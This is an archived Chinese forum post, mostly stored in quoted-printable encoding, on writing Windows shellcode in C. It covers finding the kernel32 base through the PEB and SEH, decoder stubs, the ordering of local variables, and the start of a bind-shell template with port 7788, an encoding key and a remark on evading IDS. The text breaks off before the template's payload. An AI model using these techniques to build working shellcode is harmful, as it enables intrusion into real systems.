关于windows下shellcode编写的一点思考.mht

精华BBS贴子

=CDAPI=BA=AF=CA=FD=B5=D8=D6=B7=B5=C4=BB=F1=C8=A1<BR><BR>&nbsp;=20
                        =
&nbsp;=D4=AD=C0=B4=B5=C4=B4=FA=C2=EB=D6=D0=B2=C9=D3=C3=B5=C4=CA=C7=B1=A9=C1=
=A6=CB=D1=CB=F7=B5=D8=D6=B7=BF=D5=BC=E4=B5=C4=B7=BD=B7=A8=A1=A3=D5=E2=B2=BB=
=CB=E3=D7=EE=BC=D1=B7=BD=B7=A8=A3=AC=D2=F2=CE=AA=D2=BB=CA=C7=B4=FA=C2=EB=B1=
=C8=BD=CF=B6=E0=A3=AC<BR>=B6=FE=CA=C7=D2=AA=B4=A6=C0=ED=CB=D1=CB=F7=CE=DE=
=D0=A7=D2=B3=C3=E6=D2=FD=B7=A2=B5=C4=D2=EC=B3=A3=A1=A3=CF=D6=D4=DA=BB=B9=D3=
=D0=C1=BD=D6=D6=B7=BD=B7=A8=BF=C9=D3=C3=A3=BA<BR><BR>=D2=BB=D6=D6=CA=C7=B4=
=D3PEB=CF=E0=B9=D8=CA=FD=BE=DD=BD=E1=B9=B9=D6=D0=BB=F1=C8=A1=A3=AC=C7=EB=B2=
=CE=BF=BC=C2=CC=C3=CB=D4=C2=BF=AF44=C6=DASCZ=B5=C4=A1=B6=CD=A8=B9=FDTEB/P=
EB=C3=B6=BE=D9=B5=B1=C7=B0=BD=F8=B3=CC<BR>=BF=D5=BC=E4=D6=D0=D3=C3=BB=A7=C4=
=A3=BF=E9=C1=D0=B1=ED=A1=B7=D2=BB=CE=C4=A1=A3=B4=FA=C2=EB=C8=E7=CF=C2=A3=BA=
<BR><BR>mov=20
                        eax, fs:0x30&nbsp; &nbsp; <BR>mov eax, [eax +=20
                        0x0c]<BR>mov esi, [eax + 0x1c] <BR>lodsd&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; <BR>mov ebp, [eax + 0x08] //ebp=20
                        =
=BE=CD=CA=C7kernel32.dll=B5=C4=B5=D8=D6=B7=C1=CB<BR><BR>=D5=E2=D6=D6=B7=BD=
=B7=A8=B1=C8=BD=CF=CD=A8=D3=C3=A3=AC=CA=CA=D3=C3=D3=DA2K/XP/2003=A1=A3<BR=
><BR>=C1=ED=CD=E2=D2=BB=D6=D6=B7=BD=B7=A8=BE=CD=CA=C7=CB=D1=CB=F7=BD=F8=B3=
=CC=B5=C4SEH=C1=B4=B1=ED=BB=F1=C8=A1Kernel32.UnhandledExceptionFilter=B5=C4=
=B5=D8=D6=B7=A3=AC<BR>=D4=D9=D3=C9=B8=C3=B5=D8=D6=B7=B6=D4=C6=EB=D7=B7=CB=
=DD=BB=F1=B5=C3Kernel=B5=C4=BB=F9=B5=D8=D6=B7=A3=AC=D5=E2=D6=D6=B7=BD=B7=A8=
=D2=B2=CA=C7=B1=C8=BD=CF=CD=A8=D3=C3=B5=C4=A3=AC=CA=CA=D3=C3=D3=DA9X/2K/X=
P/2003=A1=A3<BR>=D4=DA=CF=C2=C3=E6=B5=C4=B4=FA=C2=EB=D6=D0=CE=D2=BE=CD=B2=
=C9=D3=C3=C1=CB=D5=E2=D6=D6=B7=BD=B7=A8=A1=A3<BR><BR>2.=BC=B8=B6=CE=B4=FA=
=C2=EB=B5=C4=D7=F7=D3=C3<BR><BR>&nbsp;=20
                        &nbsp; =
=D4=DAShellCode=CC=E1=C8=A1=B4=FA=C2=EB=D6=D0=C4=E3=BB=F2=D0=ED=BB=E1=BE=AD=
=B3=A3=BC=FB=B5=BD<BR>&nbsp; &nbsp; temp =3D=20
                        *shellcodefnadd;<BR>&nbsp; &nbsp; if(temp =3D=3D =
0xe9)=20
                        <BR>&nbsp; &nbsp; {<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; ++shellcodefnadd;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; k=3D*(int =
*)shellcodefnadd;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;=20
                        shellcodefnadd+=3Dk;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; shellcodefnadd+=3D4;<BR>&nbsp; &nbsp; =
}<BR>&nbsp;=20
                        &nbsp; =
=D5=E2=D1=F9=B5=C4=B4=FA=C2=EB=A3=AC=C6=E4=D3=C3=CD=BE=BA=CE=D4=DA=A3=BF=B4=
=F0=B0=B8=D4=DA=D3=DA=D4=DA=D3=C3Visual=20
                        =
Studio=C9=FA=B3=C9=B5=F7=CA=D4=B0=E6=B1=BE=B5=C4=CA=B1=BA=F2=A3=AC=D3=C3=BA=
=AF=CA=FD=D6=B8=D5=EB<BR>=B2=D9=D7=F7=BB=F1=B5=C3=B5=C4=B5=D8=D6=B7=B2=A2=
=B2=BB=CA=C7=D6=B8=CF=F2=D5=E6=D5=FD=B5=C4=BA=AF=CA=FD=C8=EB=BF=DA=B5=E3=A3=
=AC=B6=F8=CA=C7=D6=B8=CF=F2=CC=F8=D7=AA=D6=B8=C1=EEJMP=A3=BA<BR><BR>&nbsp=
;=20
                        &nbsp;jmp function<BR><BR>&nbsp;=20
                        =
&nbsp;=C9=CF=C3=E6=C4=C7=B6=CE=B4=FA=C2=EB=BE=CD=CA=C7=B4=A6=C0=ED=D5=E2=D6=
=D6=C7=E9=BF=F6=B5=C4=A3=AC=C8=E7=B9=FB=B2=BB=CA=C7=CE=AA=C1=CB=B5=F7=CA=D4=
=B7=BD=B1=E3=A3=AC=CD=EA=C8=AB=BF=C9=D2=D4=C9=BE=C8=A5=A1=A3<BR><BR>&nbsp=
;=20
                        =
&nbsp;=BB=B9=D3=D0=D4=DA=B4=FA=C2=EB=D6=D0=BB=E1=BF=B4=B5=BD=A3=BA<BR>&nb=
sp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;jmp&nbsp; &nbsp;=20
                        decode_end<BR><BR>decode_start:<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;pop&nbsp; &nbsp;=20
                        edx<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;.......<BR>decode_end:<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;call&nbsp; &nbsp; =

                        decode_start<BR>Shell_start:<BR><BR>&nbsp; =
&nbsp;=20
                        =
=D6=AE=C0=E0=B5=C4=B4=FA=C2=EB=C6=E4=D7=F7=D3=C3=CA=C7=B6=A8=CE=BBShell_s=
tart=B4=A6=B5=C4=B4=FA=C2=EB=A3=AC=B1=E3=D3=DA=D7=B0=C5=E4=A3=AC=D3=C9=D3=
=DA=D4=DAC=D6=D0=C3=BB=D3=D0=B7=BD=B1=E3=B5=C4=CA=D6=B6=CE=B6=A8=CE=BB<BR=
>=B4=FA=C2=EB=B5=C4=B3=A4=B6=C8=BA=CD=CE=BB=D6=C3=A3=AC=D2=F2=B4=CB=B2=C9=
=D3=C3=B4=CB=B1=E4=CD=A8=B5=C4=D7=F6=B7=A8=A1=A3=D4=DA=D5=E2=D6=D6=B7=BD=B7=
=A8=B2=BB=B7=FB=BA=CF=B1=E0=C2=EB=B5=C4=D2=AA=C7=F3=CA=B1=A3=AC=BF=C9=D2=D4=
=B2=C9=D3=C3=B6=AF=CC=AC=BC=C6=CB=E3<BR>=BA=CD=D0=B4=C8=EB=B5=C4=B7=BD=B7=
=A8=A1=A3=B2=BB=B9=FD=B8=B4=D4=D3=C1=CB=D2=BB=B5=E3=B0=D5=C1=CB=A1=A3<BR>=
<BR>3.=B9=D8=D3=DA=BE=D6=B2=BF=B1=E4=C1=BF=B5=C4=B5=D8=D6=B7=CB=B3=D0=F2<=
BR><BR>&nbsp;=20
                        &nbsp; =
=D4=DA=D4=AD=B3=CC=D0=F2=D6=D0=B2=C9=D3=C3=C1=CB=C8=E7=CF=C2=BE=D6=B2=BF=B1=
=E4=C1=BF=BD=E1=B9=B9=A3=BA<BR><BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;WriteFileadd;<BR>&nbsp; &nbsp; =

                        FARPROC&nbsp; =
&nbsp;&nbsp;&nbsp;ReadFileadd;<BR>&nbsp;=20
                        &nbsp; FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;PeekNamedPipeadd;<BR>&nbsp; =
&nbsp;=20
                        FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;CloseHandleadd;<BR>&nbsp; =
&nbsp;=20
                        FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;CreateProcessadd;<BR>&nbsp; =
&nbsp;=20
                        FARPROC&nbsp; =
&nbsp;&nbsp;&nbsp;CreatePipeadd;<BR>&nbsp;=20
                        &nbsp; FARPROC&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;procloadlib;<BR><BR>&nbsp; =
&nbsp;=20
                        FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;apifnadd[1];<BR><BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;=D2=D4=CE=AA=D5=E2=D1=F9=B1=E0=D2=EB=C6=F7=C9=FA=B3=C9=B5=
=C4=B1=E4=C1=BF=B5=D8=D6=B7=CB=B3=D0=F2=BE=CD=CA=C7=D5=E2=D1=F9=B5=C4=A3=AC=
=D4=DA=D3=D0=D0=A9=BB=FA=C6=F7=C9=CF=D2=B2=D0=ED=C8=E7=B4=CB=A3=AC=B2=BB=B9=
=FD=D4=DA=CE=D2=B5=C4<BR>=BB=FA=C6=F7=C9=CF=D4=F2=B2=BB=C8=BB=A3=AC=B1=C8=
=C8=E7=CF=C2=C3=E6=B5=C4=B2=E2=CA=D4=B3=CC=D0=F2=A3=BA<BR><BR>#include=20
                        &lt;windows.h&gt;<BR>#include=20
                        &lt;stdio.h&gt;<BR>#include =
&lt;tchar.h&gt;<BR>#include=20
                        &lt;winioctl.h&gt;<BR><BR>void =
shell();<BR><BR>void=20
                        __cdecl main(int argc,char =
*argv[])<BR>{<BR>&nbsp;=20
                        &nbsp; FARPROC arg1;<BR>&nbsp; &nbsp; FARPROC=20
                        arg2;<BR>&nbsp; &nbsp; FARPROC arg3;<BR>&nbsp; =
&nbsp;=20
                        FARPROC arg4;<BR>&nbsp; &nbsp; FARPROC =
arg5;<BR>&nbsp;=20
                        &nbsp; int par1;<BR>&nbsp; &nbsp; int =
par2;<BR>&nbsp;=20
                        &nbsp; int par3;<BR>&nbsp; &nbsp; int =
par4;<BR>&nbsp;=20
                        &nbsp; char ch;<BR><BR>&nbsp; &nbsp; =
printf("Size of=20
                        FARPROC %d\n",sizeof(FARPROC));<BR>&nbsp; &nbsp; =

                        =
printf("\n%X\n%X\n%X\n%X\n%X\n\n&nbsp;&nbsp;\t%X\n%X\n%X\n%X\n=20
                        \t%X\n",<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;arg1,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;arg2,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;arg3,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;arg4,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;arg5,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;par1,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;par2,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;par3,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;par4,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;&amp;ch<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;);<BR>}<BR>=D4=DA=CE=D2=BB=FA=C6=F7=C9=CF=B2=FA=C9=FA=B5=
=C4=CA=E4=B3=F6=CA=C7=A3=BA<BR><BR>12FF7C<BR>12FF78<BR>12FF74<BR>12FF70<B=
R>12FF68<BR><BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;12FF6C<BR>12FF64<BR>12FF60<BR>12FF5C<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;12FF58<BR><BR>=D5=E2=D6=A4=CA=B5=C1=CB=BE=D6=B2=BF=B1=E4=
=C1=BF=B5=C4=CA=B5=BC=CA=B5=D8=D6=B7=B2=A2=B2=BB=CA=C7=CD=EA=C8=AB=B0=B4=CE=
=D2=C3=C7=D7=D4=BC=BA=B6=A8=D2=E5=C5=C5=C1=D0=B5=C4=A1=A3=D2=F2=B4=CB=D4=AD=
=C0=B4ShellCode=D6=D0=B2=C9=D3=C3=B5=C4<BR>=D6=B1=BD=D3=CA=B9=D3=C3=BA=AF=
=CA=FD=C3=FB=B5=C4=B7=BD=B7=A8=BE=CD=BF=C9=BF=BF=C1=CB=A1=A3=D2=F2=B4=CB=CE=
=D2=B2=C9=D3=C3=C1=CB=C6=E4=CB=FC=B5=C4=B7=BD=B7=A8=A3=ACC=CC=E1=B9=A9=B5=
=C4Enum=B9=D8=BC=FC=D7=D6=CA=B9=B5=C3=D5=E2=CF=EE<BR>=B9=A4=D7=F7=B1=E4=B5=
=C3=C8=DD=D2=D7=A3=AC=CF=EA=BC=FB=CF=C2=C3=E6=B5=C4=B4=FA=C2=EB=A1=A3<BR>=
<BR>4.more<BR><BR>=B9=D8=D3=DA=B1=E4=D0=CEShellCode=B6=E3=B1=DCIDS=BC=EC=B2=
=E2=A3=AC=D2=D4=BC=B0=B1=E0=C2=EB=B7=BD=B7=A8=B5=C8=D0=E8=BD=F8=D2=BB=B2=BD=
=D1=D0=BE=BF=A1=A3<BR><BR>5.=B4=FA=C2=EB<BR><BR>&nbsp;=20
                        &nbsp;=20
                        =
=BF=C9=BC=FB=A3=AC=D3=C3C=B1=E0=D0=B4ShellCode=D0=E8=D2=AA=B6=D4=B4=FA=C2=
=EB=C9=FA=B3=C9=BC=B0C=B1=E0=D2=EB=C6=F7=D0=D0=CE=AA=D3=D0=B8=FC=B6=E0=C1=
=CB=BD=E2=A1=A3=D3=D0=D0=A9=B5=D8=B7=BD=B4=A6=C0=ED=C6=F0=C0=B4=D2=B2<BR>=
=B2=BB=CA=C7=BA=DC=CA=A1=C1=A6=A1=A3=B2=BB=B9=FD=D2=BB=B5=A9=C4=A3=B0=E5=D0=
=B4=B3=C9=A3=AC=D2=D4=BA=F3=D0=B4=C6=F0=C0=B4=BB=F2=D0=B4=B8=B4=D4=D3Shel=
lCode=BE=CD=CA=A1=C1=A6=B6=E0=C1=CB=A1=A3<BR>&nbsp;=20
                        &nbsp;=20
                        =
=D4=F6=BC=D3API=CA=B1=D6=BB=D2=AA=D4=DA=CF=E0=D3=A6=B5=C4.dll=BA=F3=D4=F6=
=BC=D3=BA=AF=CA=FD=C3=FB=B3=C6=CF=EE=A3=A8=C8=E7=B9=FBstr=D6=D0=BB=B9=C3=BB=
=D3=D0=CF=E0=D3=A6=B5=C4dll=A3=AC=D4=F6=BC=D3=D6=AE=A3=A9=B2=A2<BR>=CD=AC=
=B2=BD=B8=FC=D0=C2Enum=B5=C4=CB=F7=D2=FD=BC=B4=BF=C9=A1=A3=B5=F7=D3=C3API=
=CA=B1=D6=B1=BD=D3=CA=B9=D3=C3=A3=BA<BR>&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp;=20
                        API[_APINAME](param,....param);<BR><BR>&nbsp; =
&nbsp;=20
                        =BC=B4=BF=C9=A1=A3<BR><BR>&nbsp; &nbsp; =
=C8=E7=B9=FB=C3=BB=D7=A2=CA=CD=B5=F4=D3=D0#define&nbsp;&nbsp;DEBUG=20
                        =
1=B5=C4=BB=B0=A3=AC=CF=C2=C3=E6=B4=FA=C2=EB=B1=E0=D2=EB=BA=F3=D4=CB=D0=D0=
=BC=B4=BF=C9=B6=D4ShellCode=BD=F8=D0=D0=B5=F7=CA=D4=A3=AC<BR>=CF=C2=C3=E6=
=B4=FA=C2=EB=BD=AB=B5=AF=B3=F6=D2=BB=B8=F6=B6=D4=BB=B0=BF=F2=A3=AC=B5=E3=BB=
=F7=C8=B7=B6=A8=BC=B4=BF=C9=BD=E1=CA=F8=B3=CC=D0=F2=A1=A3that's=20
                        =
ALL=A1=A3<BR>=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=
=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD<BR>/*<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;=CA=B9=D3=C3C=D3=EF=D1=D4=B1=E0=D0=B4=CD=A8=D3=C3shellcode=B5=C4=B3=
=CC=D0=F2<BR>=B3=F6=B4=A6=A3=BAinternet<BR>=D0=DE=B8=C4=A3=BAHume/=C0=E4=D3=
=EA=C6=AE=D0=C4<BR>=B2=E2=CA=D4=A3=BAWin2K=20
                        SP4 Local<BR><BR>*/<BR>#include=20
                        &lt;windows.h&gt;<BR>#include=20
                        &lt;stdio.h&gt;<BR>#include=20
                        =
&lt;winioctl.h&gt;<BR><BR>#define&nbsp;&nbsp;DEBUG=20
                        =
1<BR><BR>//<BR>//=BA=AF=CA=FD=D4=AD=D0=CD<BR>//<BR>void&nbsp;=20
                        &nbsp;&nbsp;&nbsp;DecryptSc();<BR>void&nbsp;=20
                        &nbsp;&nbsp;&nbsp;ShellCodes();<BR>void&nbsp;=20
                        &nbsp;&nbsp;&nbsp;PrintSc(char *lpBuff, int=20
                        =
buffsize);<BR><BR>//<BR>//=D3=C3=B5=BD=B5=C4=B2=BF=B7=D6=B6=A8=D2=E5<BR>/=
/<BR>#define&nbsp;&nbsp;BEGINSTRLEN&nbsp;=20
                        &nbsp; 0x08&nbsp; &nbsp;=20
                        =
//=BF=AA=CA=BC=D7=D6=B7=FB=B4=AE=B3=A4=B6=C8<BR>#define&nbsp;&nbsp;ENDSTR=
LEN&nbsp;=20
                        &nbsp;&nbsp; &nbsp;0x08&nbsp; &nbsp;=20
                        =
//=BD=E1=CA=F8=B1=EA=BC=C7=D7=D6=B7=FB=B5=C4=B3=A4=B6=C8<BR>#define&nbsp;=
&nbsp;nop_CODE&nbsp;=20
                        &nbsp;&nbsp; &nbsp; 0x90&nbsp; &nbsp;=20
                        =
//=CC=EE=B3=E4=D7=D6=B7=FB<BR>#define&nbsp;&nbsp;nop_LEN&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;0x0&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//ShellCode=C6=F0=CA=BC=B5=C4=CC=EE=B3=E4=B3=A4=B6=C8<B=
R>#define&nbsp;&nbsp;BUFFSIZE&nbsp;=20
                        &nbsp;&nbsp; &nbsp; 0x20000=20
                        =
//=CA=E4=B3=F6=BB=BA=B3=E5=C7=F8=B4=F3=D0=A1<BR><BR>#define&nbsp;&nbsp;sc=
_PORT&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;7788&nbsp; &nbsp; =
//=B0=F3=B6=A8=B6=CB=BF=DA=BA=C5=20
                        0x1e6c<BR>#define&nbsp;&nbsp;sc_BUFFSIZE&nbsp; =
&nbsp;=20
                        =
0x2000&nbsp;&nbsp;//ShellCode=BB=BA=B3=E5=C7=F8=B4=F3=D0=A1<BR><BR>#defin=
e&nbsp;&nbsp;Enc_key&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;0x7A&nbsp; &nbsp; =

                        =
//=B1=E0=C2=EB=C3=DC=D4=BF<BR><BR>#define&nbsp;&nbsp;MAX_Enc_Len&nbsp;=20
                        &nbsp; 0x400&nbsp; =
&nbsp;//=BC=D3=C3=DC=B4=FA=C2=EB=B5=C4=D7=EE=B4=F3=B3=A4=B6=C8=20
                        =
1024=D7=E3=B9=BB=A3=BF<BR>#define&nbsp;&nbsp;MAX_Sc_Len&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;0x2000&nbsp;&nbsp;//hellCode=B5=C4=D7=EE=B4=F3=B3=A4=B6=
=C8=20